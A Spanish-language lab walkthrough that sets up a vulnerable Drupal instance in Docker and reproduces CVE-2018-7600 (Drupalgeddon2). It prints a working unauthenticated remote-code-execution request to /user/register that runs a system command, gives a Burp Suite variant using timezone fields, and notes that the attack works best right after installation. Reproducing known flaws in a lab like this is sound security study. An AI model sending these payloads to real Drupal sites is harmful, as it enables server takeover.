
(CVE-2018-7600)**
Las versiones anteriores a Drupal 7.58, las versiones 8.x anteriores a 8.3.9, las versiones 8.4.x anteriores a 8.4.6 y las versiones 8.5.x anteriores a 8.5.1 permiten que un atacante remoto ejecute código arbitrario debido a un problema que afecta a varios subsistemas que utilizan configuraciones de módulos básicas o comunes, incluida la API de Formularios.
Referencias:

Primero, como se muestra en la siguiente pantalla, se hace un fork del contenido de ese vulhub.

Luego se descarga esa carpeta como archivo ZIP y se trae

Se descomprimen los contenidos relacionados con drupal (CVE-2018-7600) y se suben a mi repositorio

Ahora, a través de ese repositorio, configuremos ese entorno en Docker.

Como se muestra a continuación, se clona mi repo con el comando git clone y se accede con el comando cd a la carpeta donde existe el archivo docker-compose.yml.
Después, se ejecuta Docker en segundo plano con el siguiente comando:
docker-compose up -d
Se puede ver que se ejecuta de la siguiente manera.

Vamos a la dirección http://localhost:8080 para ir a la página principal de Drupal.

Aparece la pantalla de configuración del entorno de Drupal y luego se muestra la página principal de Drupal.
Para intentar el exploit, se configura de forma sencilla como se muestra a continuación.

Entonces carga de la siguiente manera.

Después se ingresan configuraciones adicionales del sitio (se configura como test para una configuración rápida para el exploit).



Como se muestra a continuación, se ha completado la configuración final del sitio Drupal.

Haciendo referencia a a2u/CVE-2018-7600, se puede enviar la siguiente solicitud a drupal.
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
Como CVE-2018-7600 (Drupalgeddon2) es una vulnerabilidad que intenta un ataque no autenticado manipulando los campos del formulario a través de AJAX mediante /user/register, también se puede intentar modificar el paquete con Burp Suite.
Primero, se accede a Registrarse a través del sitio proxy de Burp Suite, se ingresa cualquier valor y se captura el paquete.

Se modifica ese paquete usando Burp Suite.

Se envía ese paquete al Repeater y se agrega el siguiente código al final:
element_parents = timezone/timezone/#value
ajax_form = 1
_wrapper_format = drupal_ajax
timezone[timezone] = id
Después, al enviar (Send), se puede ver que aparece el comando OK como se muestra a continuación.

Para realizar una solicitud realmente más maliciosa, el ataque CVE-2018-7600 (Drupalgeddon2) es más efectivo si se envía inmediatamente después de la instalación de Drupal (antes de que termine el asistente de instalación de Drupal).